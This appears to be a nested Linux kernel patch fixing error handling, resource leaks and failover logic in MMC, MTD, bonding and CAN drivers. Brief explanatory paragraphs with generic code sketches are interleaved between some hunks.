+@@ -49,7 +49,8 @@
+ /* DM_CM_INFO1 and DM_CM_INFO1_MASK */
+ #define INFO1_CLEAR		0
+ #define INFO1_MASK_CLEAR	GENMASK_ULL(31, 0)
+-#define INFO1_DTRANEND1		BIT(17)
++#define INFO1_DTRANEND1		BIT(20)
++#define INFO1_DTRANEND1_OLD	BIT(17)
+ #define INFO1_DTRANEND0		BIT(16)
+ 
+ /* DM_CM_INFO2 and DM_CM_INFO2_MASK */
+@@ -165,6 +166,7 @@ static const struct renesas_sdhi_quirks sdhi_quirks_4tap_nohs400_one_rx = {
+ 	.hs400_disabled = true,
+ 	.hs400_4taps = true,
+ 	.dma_one_rx_only = true,
++	.old_info1_layout = true,
+ };
+ 
+ static const struct renesas_sdhi_quirks sdhi_quirks_4tap = {
+diff --git a/drivers/mmc/host/rtsx_pci_sdmmc.c b/drivers/mmc/host/rtsx_pci_sdmmc.c
+index e1580f78c6b2d..8098726dcc0bf 100644
+--- a/drivers/mmc/host/rtsx_pci_sdmmc.c
++++ b/drivers/mmc/host/rtsx_pci_sdmmc.c
+@@ -1474,6 +1474,7 @@ static int rtsx_pci_sdmmc_drv_probe(struct platform_device *pdev)
+ 	struct realtek_pci_sdmmc *host;
+ 	struct rtsx_pcr *pcr;
+ 	struct pcr_handle *handle = pdev->dev.platform_data;
++	int ret;
+ 
+ 	if (!handle)
+ 		return -ENXIO;
+@@ -1511,7 +1512,13 @@ static int rtsx_pci_sdmmc_drv_probe(struct platform_device *pdev)
+ 	pm_runtime_mark_last_busy(&pdev->dev);
+ 	pm_runtime_use_autosuspend(&pdev->dev);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++		pm_runtime_dont_use_autosuspend(&pdev->dev);
++		pm_runtime_disable(&pdev->dev);
++		mmc_free_host(mmc);
++		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mmc/host/rtsx_usb_sdmmc.c b/drivers/mmc/host/rtsx_usb_sdmmc.c
+index 5798aee066531..2c650cd58693e 100644
+--- a/drivers/mmc/host/rtsx_usb_sdmmc.c
++++ b/drivers/mmc/host/rtsx_usb_sdmmc.c
+@@ -1329,6 +1329,7 @@ static int rtsx_usb_sdmmc_drv_probe(struct platform_device *pdev)
+ #ifdef RTSX_USB_USE_LEDS_CLASS
+ 	int err;
+ #endif
++	int ret;
+ 
+ 	ucr = usb_get_intfdata(to_usb_interface(pdev->dev.parent));
+ 	if (!ucr)
+@@ -1365,7 +1366,15 @@ static int rtsx_usb_sdmmc_drv_probe(struct platform_device *pdev)
+ 	INIT_WORK(&host->led_work, rtsx_usb_update_led);
+ 
+ #endif
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++#ifdef RTSX_USB_USE_LEDS_CLASS
++		led_classdev_unregister(&host->led);
++#endif
++		mmc_free_host(mmc);
++		pm_runtime_disable(&pdev->dev);
++		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mmc/host/sdhci-tegra.c b/drivers/mmc/host/sdhci-tegra.c
+index c71000a07656e..1adaa94c31aca 100644
+--- a/drivers/mmc/host/sdhci-tegra.c
++++ b/drivers/mmc/host/sdhci-tegra.c
+@@ -1526,7 +1526,8 @@ static const struct sdhci_pltfm_data sdhci_tegra186_pdata = {
+ 		  SDHCI_QUIRK_NO_HISPD_BIT |
+ 		  SDHCI_QUIRK_BROKEN_ADMA_ZEROLEN_DESC |
+ 		  SDHCI_QUIRK_CAP_CLOCK_BASE_BROKEN,
+-	.quirks2 = SDHCI_QUIRK2_PRESET_VALUE_BROKEN,
++	.quirks2 = SDHCI_QUIRK2_PRESET_VALUE_BROKEN |
++		   SDHCI_QUIRK2_ISSUE_CMD_DAT_RESET_TOGETHER,
+ 	.ops  = &tegra186_sdhci_ops,
+ };
+ 
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index c7ad32a75b570..632341911b6e7 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -270,6 +270,11 @@ enum sdhci_reset_reason {
+ 
+ static void sdhci_reset_for_reason(struct sdhci_host *host, enum sdhci_reset_reason reason)
+ {
++	if (host->quirks2 & SDHCI_QUIRK2_ISSUE_CMD_DAT_RESET_TOGETHER) {
++		sdhci_do_reset(host, SDHCI_RESET_CMD | SDHCI_RESET_DATA);
++		return;
++	}
++
+ 	switch (reason) {
+ 	case SDHCI_RESET_FOR_INIT:
+ 		sdhci_do_reset(host, SDHCI_RESET_CMD | SDHCI_RESET_DATA);
+diff --git a/drivers/mmc/host/sdhci.h b/drivers/mmc/host/sdhci.h
+index 87a3aaa074387..5ce7cdcc192fd 100644
+--- a/drivers/mmc/host/sdhci.h
++++ b/drivers/mmc/host/sdhci.h
+@@ -478,6 +478,8 @@ struct sdhci_host {
+  * block count.
+  */
+ #define SDHCI_QUIRK2_USE_32BIT_BLK_CNT			(1<<18)
++/* Issue CMD and DATA reset together */
++#define SDHCI_QUIRK2_ISSUE_CMD_DAT_RESET_TOGETHER	(1<<19)
+ 
+ 	int irq;		/* Device IRQ */
+ 	void __iomem *ioaddr;	/* Mapped address */
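
The new SDHCI_QUIRK2_ISSUE_CMD_DAT_RESET_TOGETHER bit follows the existing quirks2 convention: one bit per controller workaround, tested before the affected code path, as the sdhci.c hunk above does. A compact sketch of that convention, with my_* placeholders standing in for the SDHCI names:

    /* Illustrative only: how a quirks2 bit short-circuits the
     * per-reason reset logic.
     */
    #define MY_QUIRK2_CMD_DAT_RESET_TOGETHER  (1 << 19)
    #define MY_RESET_CMD   0x2
    #define MY_RESET_DATA  0x4

    struct my_host { unsigned int quirks2; };

    static void my_do_reset(struct my_host *host, unsigned int mask)
    {
    	/* ...write mask to the controller's reset register... */
    	(void)host; (void)mask;
    }

    static void my_reset_for_reason(struct my_host *host, int reason)
    {
    	if (host->quirks2 & MY_QUIRK2_CMD_DAT_RESET_TOGETHER) {
    		/* quirky silicon: always reset CMD and DATA together */
    		my_do_reset(host, MY_RESET_CMD | MY_RESET_DATA);
    		return;
    	}
    	/* ...otherwise choose the reset mask per reason... */
    	(void)reason;
    }
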
+diff --git a/drivers/mmc/host/sdhci_f_sdh30.c b/drivers/mmc/host/sdhci_f_sdh30.c
+index 3f5977979cf25..6c4f43e112826 100644
+--- a/drivers/mmc/host/sdhci_f_sdh30.c
++++ b/drivers/mmc/host/sdhci_f_sdh30.c
+@@ -168,6 +168,9 @@ static int sdhci_f_sdh30_probe(struct platform_device *pdev)
+ 	if (reg & SDHCI_CAN_DO_8BIT)
+ 		priv->vendor_hs200 = F_SDH30_EMMC_HS200;
+ 
++	if (!(reg & SDHCI_TIMEOUT_CLK_MASK))
++		host->quirks |= SDHCI_QUIRK_DATA_TIMEOUT_USES_SDCLK;
++
+ 	ret = sdhci_add_host(host);
+ 	if (ret)
+ 		goto err_add_host;
+diff --git a/drivers/mmc/host/toshsd.c b/drivers/mmc/host/toshsd.c
+index 8d037c2071abc..497791ffada6d 100644
+--- a/drivers/mmc/host/toshsd.c
++++ b/drivers/mmc/host/toshsd.c
+@@ -651,7 +651,9 @@ static int toshsd_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	if (ret)
+ 		goto unmap;
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto free_irq;
+ 
+ 	base = pci_resource_start(pdev, 0);
+ 	dev_dbg(&pdev->dev, "MMIO %pa, IRQ %d\n", &base, pdev->irq);
+@@ -660,6 +662,8 @@ static int toshsd_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	return 0;
+ 
++free_irq:
++	free_irq(pdev->irq, host);
+ unmap:
+ 	pci_iounmap(pdev, host->ioaddr);
+ release:
+diff --git a/drivers/mmc/host/via-sdmmc.c b/drivers/mmc/host/via-sdmmc.c
+index 88662a90ed960..a2b0d9461665b 100644
+--- a/drivers/mmc/host/via-sdmmc.c
++++ b/drivers/mmc/host/via-sdmmc.c
+@@ -1151,7 +1151,9 @@ static int via_sd_probe(struct pci_dev *pcidev,
+ 	    pcidev->subsystem_device == 0x3891)
+ 		sdhost->quirks = VIA_CRDR_QUIRK_300MS_PWRDELAY;
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto unmap;
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/host/vub300.c b/drivers/mmc/host/vub300.c
+index 97beece62fec4..ab36ec4797478 100644
+--- a/drivers/mmc/host/vub300.c
++++ b/drivers/mmc/host/vub300.c
+@@ -2299,14 +2299,14 @@ static int vub300_probe(struct usb_interface *interface,
+ 				0x0000, 0x0000, &vub300->system_port_status,
+ 				sizeof(vub300->system_port_status), 1000);
+ 	if (retval < 0) {
+-		goto error4;
++		goto error5;
+ 	} else if (sizeof(vub300->system_port_status) == retval) {
+ 		vub300->card_present =
+ 			(0x0001 & vub300->system_port_status.port_flags) ? 1 : 0;
+ 		vub300->read_only =
+ 			(0x0010 & vub300->system_port_status.port_flags) ? 1 : 0;
+ 	} else {
+-		goto error4;
++		goto error5;
+ 	}
+ 	usb_set_intfdata(interface, vub300);
+ 	INIT_DELAYED_WORK(&vub300->pollwork, vub300_pollwork_thread);
+@@ -2329,8 +2329,13 @@ static int vub300_probe(struct usb_interface *interface,
+ 			 "USB vub300 remote SDIO host controller[%d]"
+ 			 "connected with no SD/SDIO card inserted\n",
+ 			 interface_to_InterfaceNumber(interface));
+-	mmc_add_host(mmc);
++	retval = mmc_add_host(mmc);
++	if (retval)
++		goto error6;
++
+ 	return 0;
++error6:
++	del_timer_sync(&vub300->inactivity_timer);
+ error5:
+ 	mmc_free_host(mmc);
+ 	/*
+diff --git a/drivers/mmc/host/wbsd.c b/drivers/mmc/host/wbsd.c
+index 67ecd342fe5f1..7c7ec8d10232b 100644
+--- a/drivers/mmc/host/wbsd.c
++++ b/drivers/mmc/host/wbsd.c
+@@ -1698,7 +1698,17 @@ static int wbsd_init(struct device *dev, int base, int irq, int dma,
+ 	 */
+ 	wbsd_init_device(host);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++		if (!pnp)
++			wbsd_chip_poweroff(host);
++
++		wbsd_release_resources(host);
++		wbsd_free_mmc(dev);
++
++		mmc_free_host(mmc);
++		return ret;
++	}
+ 
+ 	pr_info("%s: W83L51xD", mmc_hostname(mmc));
+ 	if (host->chip_id != 0)
+diff --git a/drivers/mmc/host/wmt-sdmmc.c b/drivers/mmc/host/wmt-sdmmc.c
+index 9b5c503e3a3fc..9aa3027ca25e4 100644
+--- a/drivers/mmc/host/wmt-sdmmc.c
++++ b/drivers/mmc/host/wmt-sdmmc.c
+@@ -856,11 +856,15 @@ static int wmt_mci_probe(struct platform_device *pdev)
+ 	/* configure the controller to a known 'ready' state */
+ 	wmt_reset_hardware(mmc);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto fail7;
+ 
+ 	dev_info(&pdev->dev, "WMT SDHC Controller initialized\n");
+ 
+ 	return 0;
++fail7:
++	clk_disable_unprepare(priv->clk_sdmmc);
+ fail6:
+ 	clk_put(priv->clk_sdmmc);
+ fail5_and_a_half:
+diff --git a/drivers/mtd/lpddr/lpddr2_nvm.c b/drivers/mtd/lpddr/lpddr2_nvm.c
+index 367e2d906de02..e71af4c490969 100644
+--- a/drivers/mtd/lpddr/lpddr2_nvm.c
++++ b/drivers/mtd/lpddr/lpddr2_nvm.c
+@@ -433,6 +433,8 @@ static int lpddr2_nvm_probe(struct platform_device *pdev)
+ 
+ 	/* lpddr2_nvm address range */
+ 	add_range = platform_get_resource(pdev, IORESOURCE_MEM, 0);
++	if (!add_range)
++		return -ENODEV;
+ 
+ 	/* Populate map_info data structure */
+ 	*map = (struct map_info) {
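
The lpddr2_nvm hunk adds the missing NULL check on platform_get_resource(), which returns NULL when no such resource exists. A minimal sketch of the guard, with a placeholder probe function:

    /* Sketch: platform_get_resource() may return NULL and must be
     * checked before the resource is dereferenced.
     */
    #include <linux/platform_device.h>
    #include <linux/ioport.h>

    static int my_probe(struct platform_device *pdev)
    {
    	struct resource *res;

    	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
    	if (!res)
    		return -ENODEV;         /* no address range supplied */

    	/* safe to use res->start / resource_size(res) from here */
    	return 0;
    }
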
+diff --git a/drivers/mtd/maps/pxa2xx-flash.c b/drivers/mtd/maps/pxa2xx-flash.c
+index 1749dbbacc135..62a5bf41a6d72 100644
+--- a/drivers/mtd/maps/pxa2xx-flash.c
++++ b/drivers/mtd/maps/pxa2xx-flash.c
+@@ -64,6 +64,7 @@ static int pxa2xx_flash_probe(struct platform_device *pdev)
+ 	if (!info->map.virt) {
+ 		printk(KERN_WARNING "Failed to ioremap %s\n",
+ 		       info->map.name);
++		kfree(info);
+ 		return -ENOMEM;
+ 	}
+ 	info->map.cached = ioremap_cache(info->map.phys, info->map.size);
+@@ -85,6 +86,7 @@ static int pxa2xx_flash_probe(struct platform_device *pdev)
+ 		iounmap((void *)info->map.virt);
+ 		if (info->map.cached)
+ 			iounmap(info->map.cached);
++		kfree(info);
+ 		return -EIO;
+ 	}
+ 	info->mtd->dev.parent = &pdev->dev;
+diff --git a/drivers/mtd/mtdcore.c b/drivers/mtd/mtdcore.c
+index 0b4ca0aa41321..686ada1a63e9a 100644
+--- a/drivers/mtd/mtdcore.c
++++ b/drivers/mtd/mtdcore.c
+@@ -723,8 +723,10 @@ int add_mtd_device(struct mtd_info *mtd)
+ 	mtd_check_of_node(mtd);
+ 	of_node_get(mtd_get_of_node(mtd));
+ 	error = device_register(&mtd->dev);
+-	if (error)
++	if (error) {
++		put_device(&mtd->dev);
+ 		goto fail_added;
++	}
+ 
+ 	/* Add the nvmem provider */
+ 	error = mtd_nvmem_add(mtd);
+@@ -774,6 +776,7 @@ int del_mtd_device(struct mtd_info *mtd)
+ {
+ 	int ret;
+ 	struct mtd_notifier *not;
++	struct device_node *mtd_of_node;
+ 
+ 	mutex_lock(&mtd_table_mutex);
+ 
+@@ -792,6 +795,7 @@ int del_mtd_device(struct mtd_info *mtd)
+ 		       mtd->index, mtd->name, mtd->usecount);
+ 		ret = -EBUSY;
+ 	} else {
++		mtd_of_node = mtd_get_of_node(mtd);
+ 		debugfs_remove_recursive(mtd->dbg.dfs_dir);
+ 
+ 		/* Try to remove the NVMEM provider */
+@@ -803,7 +807,7 @@ int del_mtd_device(struct mtd_info *mtd)
+ 		memset(&mtd->dev, 0, sizeof(mtd->dev));
+ 
+ 		idr_remove(&mtd_idr, mtd->index);
+-		of_node_put(mtd_get_of_node(mtd));
++		of_node_put(mtd_of_node);
+ 
+ 		module_put(THIS_MODULE);
+ 		ret = 0;
+@@ -2483,6 +2487,7 @@ static int __init init_mtd(void)
+ out_procfs:
+ 	if (proc_mtd)
+ 		remove_proc_entry("mtd", NULL);
++	bdi_unregister(mtd_bdi);
+ 	bdi_put(mtd_bdi);
+ err_bdi:
+ 	class_unregister(&mtd_class);
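
The mtdcore hunk applies the driver-core rule that a failed device_register() must be answered with put_device() rather than a direct free, because the embedded kobject was already initialized and holds a reference. Sketched generically:

    /* Sketch of the device_register() error rule, not mtdcore itself. */
    #include <linux/device.h>

    static int my_register(struct device *dev)
    {
    	int err = device_register(dev);

    	if (err) {
    		/* device_initialize() already ran inside
    		 * device_register(); put_device() runs the
    		 * release path instead of leaking the ref.
    		 */
    		put_device(dev);
    		return err;
    	}
    	return 0;
    }
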
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index bee8fc4c9f078..0cf1a1797ea32 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -1914,7 +1914,8 @@ static int spi_nor_spimem_check_readop(struct spi_nor *nor,
+ 	spi_nor_spimem_setup_op(nor, &op, read->proto);
+ 
+ 	/* convert the dummy cycles to the number of bytes */
+-	op.dummy.nbytes = (nor->read_dummy * op.dummy.buswidth) / 8;
++	op.dummy.nbytes = (read->num_mode_clocks + read->num_wait_states) *
++			  op.dummy.buswidth / 8;
+ 	if (spi_nor_protocol_is_dtr(nor->read_proto))
+ 		op.dummy.nbytes *= 2;
+ 
+diff --git a/drivers/mtd/spi-nor/sysfs.c b/drivers/mtd/spi-nor/sysfs.c
+index 9aec9d8a98ada..4c3b351aef245 100644
+--- a/drivers/mtd/spi-nor/sysfs.c
++++ b/drivers/mtd/spi-nor/sysfs.c
+@@ -67,6 +67,19 @@ static struct bin_attribute *spi_nor_sysfs_bin_entries[] = {
+ 	NULL
+ };
+ 
++static umode_t spi_nor_sysfs_is_visible(struct kobject *kobj,
++					struct attribute *attr, int n)
++{
++	struct spi_device *spi = to_spi_device(kobj_to_dev(kobj));
++	struct spi_mem *spimem = spi_get_drvdata(spi);
++	struct spi_nor *nor = spi_mem_get_drvdata(spimem);
++
++	if (attr == &dev_attr_jedec_id.attr && !nor->info->id_len)
++		return 0;
++
++	return 0444;
++}
++
+ static umode_t spi_nor_sysfs_is_bin_visible(struct kobject *kobj,
+ 					    struct bin_attribute *attr, int n)
+ {
+@@ -82,6 +95,7 @@ static umode_t spi_nor_sysfs_is_bin_visible(struct kobject *kobj,
+ 
+ static const struct attribute_group spi_nor_sysfs_group = {
+ 	.name		= "spi-nor",
++	.is_visible	= spi_nor_sysfs_is_visible,
+ 	.is_bin_visible	= spi_nor_sysfs_is_bin_visible,
+ 	.attrs		= spi_nor_sysfs_entries,
+ 	.bin_attrs	= spi_nor_sysfs_bin_entries,
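
The spi-nor sysfs hunk adds an .is_visible callback so the jedec_id attribute disappears when the flash provides no ID bytes. A self-contained sketch of the visibility hook, where every my_* name is a placeholder: returning 0 hides the attribute, returning a mode such as 0444 exposes it.

    #include <linux/device.h>
    #include <linux/sysfs.h>

    static ssize_t my_id_show(struct device *dev,
    			  struct device_attribute *attr, char *buf)
    {
    	return sysfs_emit(buf, "none\n");
    }
    static DEVICE_ATTR_RO(my_id);

    static struct attribute *my_attrs[] = {
    	&dev_attr_my_id.attr,
    	NULL
    };

    static bool my_have_id(struct kobject *kobj)
    {
    	return false;                   /* stub: no ID bytes */
    }

    static umode_t my_is_visible(struct kobject *kobj,
    			     struct attribute *attr, int n)
    {
    	if (attr == &dev_attr_my_id.attr && !my_have_id(kobj))
    		return 0;               /* hide when there is no data */
    	return 0444;                    /* read-only otherwise */
    }

    static const struct attribute_group my_group = {
    	.is_visible	= my_is_visible,
    	.attrs		= my_attrs,
    };
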
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index b9a882f182d29..b108f2f4adc20 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -2531,12 +2531,21 @@ static int bond_slave_info_query(struct net_device *bond_dev, struct ifslave *in
+ /* called with rcu_read_lock() */
+ static int bond_miimon_inspect(struct bonding *bond)
+ {
++	bool ignore_updelay = false;
+ 	int link_state, commit = 0;
+ 	struct list_head *iter;
+ 	struct slave *slave;
+-	bool ignore_updelay;
+ 
+-	ignore_updelay = !rcu_dereference(bond->curr_active_slave);
++	if (BOND_MODE(bond) == BOND_MODE_ACTIVEBACKUP) {
++		ignore_updelay = !rcu_dereference(bond->curr_active_slave);
++	} else {
++		struct bond_up_slave *usable_slaves;
++
++		usable_slaves = rcu_dereference(bond->usable_slaves);
++
++		if (usable_slaves && usable_slaves->count == 0)
++			ignore_updelay = true;
++	}
+ 
+ 	bond_for_each_slave_rcu(bond, slave, iter) {
+ 		bond_propose_link_state(slave, BOND_LINK_NOCHANGE);
+@@ -2644,8 +2653,9 @@ static void bond_miimon_link_change(struct bonding *bond,
+ 
+ static void bond_miimon_commit(struct bonding *bond)
+ {
+-	struct list_head *iter;
+ 	struct slave *slave, *primary;
++	bool do_failover = false;
++	struct list_head *iter;
+ 
+ 	bond_for_each_slave(bond, slave, iter) {
+ 		switch (slave->link_new_state) {
+@@ -2689,8 +2699,9 @@ static void bond_miimon_commit(struct bonding *bond)
+ 
+ 			bond_miimon_link_change(bond, slave, BOND_LINK_UP);
+ 
+-			if (!bond->curr_active_slave || slave == primary)
+-				goto do_failover;
++			if (!rcu_access_pointer(bond->curr_active_slave) || slave == primary ||
++			    slave->prio > rcu_dereference(bond->curr_active_slave)->prio)
++				do_failover = true;
+ 
+ 			continue;
+ 
+@@ -2711,7 +2722,7 @@ static void bond_miimon_commit(struct bonding *bond)
+ 			bond_miimon_link_change(bond, slave, BOND_LINK_DOWN);
+ 
+ 			if (slave == rcu_access_pointer(bond->curr_active_slave))
+-				goto do_failover;
++				do_failover = true;
+ 
+ 			continue;
+ 
+@@ -2722,8 +2733,9 @@ static void bond_miimon_commit(struct bonding *bond)
+ 
+ 			continue;
+ 		}
++	}
+ 
+-do_failover:
++	if (do_failover) {
+ 		block_netpoll_tx();
+ 		bond_select_active_slave(bond);
+ 		unblock_netpoll_tx();
+@@ -3521,6 +3533,7 @@ static int bond_ab_arp_inspect(struct bonding *bond)
+  */
+ static void bond_ab_arp_commit(struct bonding *bond)
+ {
++	bool do_failover = false;
+ 	struct list_head *iter;
+ 	unsigned long last_tx;
+ 	struct slave *slave;
+@@ -3550,8 +3563,9 @@ static void bond_ab_arp_commit(struct bonding *bond)
+ 				slave_info(bond->dev, slave->dev, "link status definitely up\n");
+ 
+ 				if (!rtnl_dereference(bond->curr_active_slave) ||
+-				    slave == rtnl_dereference(bond->primary_slave))
+-					goto do_failover;
++				    slave == rtnl_dereference(bond->primary_slave) ||
++				    slave->prio > rtnl_dereference(bond->curr_active_slave)->prio)
++					do_failover = true;
+ 
+ 			}
+ 
+@@ -3570,7 +3584,7 @@ static void bond_ab_arp_commit(struct bonding *bond)
+ 
+ 			if (slave == rtnl_dereference(bond->curr_active_slave)) {
+ 				RCU_INIT_POINTER(bond->current_arp_slave, NULL);
+-				goto do_failover;
++				do_failover = true;
+ 			}
+ 
+ 			continue;
+@@ -3594,8 +3608,9 @@ static void bond_ab_arp_commit(struct bonding *bond)
+ 				  slave->link_new_state);
+ 			continue;
+ 		}
++	}
+ 
+-do_failover:
++	if (do_failover) {
+ 		block_netpoll_tx();
+ 		bond_select_active_slave(bond);
+ 		unblock_netpoll_tx();
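
Both bonding hunks replace a goto that jumped out of the slave-iteration loop with a do_failover flag that is set during the scan and acted on once afterwards, so per-slave processing now runs for every slave. The refactor, reduced to its shape (generic names, not the bonding code):

    #include <stdbool.h>

    struct slave { int link_up; int was_active; };

    static void commit(struct slave *slaves, int n)
    {
    	bool do_failover = false;
    	int i;

    	for (i = 0; i < n; i++) {
    		/* per-slave bookkeeping now runs for every entry */
    		if (!slaves[i].link_up && slaves[i].was_active)
    			do_failover = true;   /* no goto: keep looping */
    	}

    	if (do_failover) {
    		/* single failover after the full scan */
    	}
    }
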
+diff --git a/drivers/net/can/m_can/m_can.c b/drivers/net/can/m_can/m_can.c
+index e5575d2755e4b..2de998b98cb5e 100644
+--- a/drivers/net/can/m_can/m_can.c
++++ b/drivers/net/can/m_can/m_can.c
+@@ -1233,10 +1233,17 @@ static int m_can_set_bittiming(struct net_device *dev)
+  * - setup bittiming
+  * - configure timestamp generation
+  */
+-static void m_can_chip_config(struct net_device *dev)
++static int m_can_chip_config(struct net_device *dev)
+ {
+ 	struct m_can_classdev *cdev = netdev_priv(dev);
+ 	u32 cccr, test;
++	int err;
++
++	err = m_can_init_ram(cdev);
++	if (err) {
++		dev_err(cdev->dev, "Message RAM configuration failed\n");
++		return err;
++	}
+ 
+ 	m_can_config_endisable(cdev, true);
+ 
+@@ -1360,18 +1367,25 @@ static void m_can_chip_config(struct net_device *dev)
+ 
+ 	if (cdev->ops->init)
+ 		cdev->ops->init(cdev);
++
++	return 0;
+ }
+ 
+-static void m_can_start(struct net_device *dev)
++static int m_can_start(struct net_device *dev)
+ {
+ 	struct m_can_classdev *cdev = netdev_priv(dev);
++	int ret;
+ 
+ 	/* basic m_can configuration */
+-	m_can_chip_config(dev);
++	ret = m_can_chip_config(dev);
++	if (ret)
++		return ret;
+ 
+ 	cdev->can.state = CAN_STATE_ERROR_ACTIVE;
+ 
+ 	m_can_enable_all_interrupts(cdev);
++
++	return 0;
+ }
+ 
+ static int m_can_set_mode(struct net_device *dev, enum can_mode mode)
+@@ -1799,7 +1813,9 @@ static int m_can_open(struct net_device *dev)
+ 	}
+ 
+ 	/* start the m_can controller */
+-	m_can_start(dev);
++	err = m_can_start(dev);
++	if (err)
++		goto exit_irq_fail;
+ 
+ 	if (!cdev->is_peripheral)
+ 		napi_enable(&cdev->napi);
+@@ -2058,9 +2074,13 @@ int m_can_class_resume(struct device *dev)
+ 		ret = m_can_clk_start(cdev);
+ 		if (ret)
+ 			return ret;
++		ret = m_can_start(ndev);
++		if (ret) {
++			m_can_clk_stop(cdev);
++
++			return ret;
++		}
+ 
+-		m_can_init_ram(cdev);
+-		m_can_start(ndev);
+ 		netif_device_attach(ndev);
+ 		netif_start_queue(ndev);
+ 	}
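
The m_can hunks turn m_can_chip_config() and m_can_start() from void into int so a Message RAM init failure reaches the open and resume paths, which now bail out. The propagation chain, sketched with stub names (not the m_can code):

    #include <errno.h>

    struct dev_priv { int ram_ok; };

    static int init_ram(struct dev_priv *p)        /* stub: can fail */
    {
    	return p->ram_ok ? 0 : -EIO;
    }

    static void enable_interrupts(struct dev_priv *p) { (void)p; }

    static int chip_config(struct dev_priv *p)
    {
    	int err = init_ram(p);

    	if (err)
    		return err;             /* surface the failure */
    	/* ...rest of configuration... */
    	return 0;
    }

    static int start(struct dev_priv *p)
    {
    	int ret = chip_config(p);

    	if (ret)
    		return ret;             /* propagate, don't swallow */
    	enable_interrupts(p);
    	return 0;
    }
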
+diff --git a/drivers/net/can/m_can/m_can_platform.c b/drivers/net/can/m_can/m_can_platform.c
+index eee47bad05920..de6d8e01bf2e8 100644
+--- a/drivers/net/can/m_can/m_can_platform.c
++++ b/drivers/net/can/m_can/m_can_platform.c
+@@ -140,10 +140,6 @@ static int m_can_plat_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, mcan_class);
+ 
+-	ret = m_can_init_ram(mcan_class);
+-	if (ret)
+-		goto probe_fail;
+-
+ 	pm_runtime_enable(mcan_class->dev);
+ 	ret = m_can_class_register(mcan_class);
+ 	if (ret)
+diff --git a/drivers/net/can/m_can/tcan4x5x-core.c b/drivers/net/can/m_can/tcan4x5x-core.c
+index 41645a24384ce..2342aa011647c 100644
+--- a/drivers/net/can/m_can/tcan4x5x-core.c
++++ b/drivers/net/can/m_can/tcan4x5x-core.c
+@@ -10,7 +10,7 @@
+ #define TCAN4X5X_DEV_ID1 0x04
+ #define TCAN4X5X_REV 0x08
+ #define TCAN4X5X_STATUS 0x0C
+-#define TCAN4X5X_ERROR_STATUS 0x10
++#define TCAN4X5X_ERROR_STATUS_MASK 0x10
+ #define TCAN4X5X_CONTROL 0x14
+ 
+ #define TCAN4X5X_CONFIG 0x800
+@@ -204,17 +204,7 @@ static int tcan4x5x_clear_interrupts(struct m_can_classdev *cdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_MCAN_INT_REG,
+-				      TCAN4X5X_ENABLE_MCAN_INT);
+-	if (ret)
+-		return ret;
+-
+-	ret = tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_INT_FLAGS,
+-				      TCAN4X5X_CLEAR_ALL_INT);
+-	if (ret)
+-		return ret;
+-
+-	return tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_ERROR_STATUS,
++	return tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_INT_FLAGS,
+ 				       TCAN4X5X_CLEAR_ALL_INT);
+ }
+ 
+@@ -234,8 +224,8 @@ static int tcan4x5x_init(struct m_can_classdev *cdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* Zero out the MCAN buffers */
+-	ret = m_can_init_ram(cdev);
++	ret = tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_ERROR_STATUS_MASK,
++				      TCAN4X5X_CLEAR_ALL_INT);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb.h b/drivers/net/can/usb/kvaser_usb/kvaser_usb.h
+index f6c0938027ece..ff10b3790d844 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb.h
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb.h
+@@ -76,6 +76,14 @@ struct kvaser_usb_tx_urb_context {
+ 	u32 echo_index;
+ };
+ 
++struct kvaser_usb_busparams {
++	__le32 bitrate;
++	u8 tseg1;
++	u8 tseg2;
++	u8 sjw;
++	u8 nsamples;
++} __packed;
++
+ struct kvaser_usb {
+ 	struct usb_device *udev;
+ 	struct usb_interface *intf;
+@@ -104,13 +112,19 @@ struct kvaser_usb_net_priv {
+ 	struct can_priv can;
+ 	struct can_berr_counter bec;
+ 
++	/* subdriver-specific data */
++	void *sub_priv;
++
+ 	struct kvaser_usb *dev;
+ 	struct net_device *netdev;
+ 	int channel;
+ 
+-	struct completion start_comp, stop_comp, flush_comp;
++	struct completion start_comp, stop_comp, flush_comp,
++			  get_busparams_comp;
+ 	struct usb_anchor tx_submitted;
+ 
++	struct kvaser_usb_busparams busparams_nominal, busparams_data;
++
+ 	spinlock_t tx_contexts_lock; /* lock for active_tx_contexts */
+ 	int active_tx_contexts;
+ 	struct kvaser_usb_tx_urb_context tx_contexts[];
+@@ -120,11 +134,15 @@ struct kvaser_usb_net_priv {
+  * struct kvaser_usb_dev_ops - Device specific functions
+  * @dev_set_mode:		used for can.do_set_mode
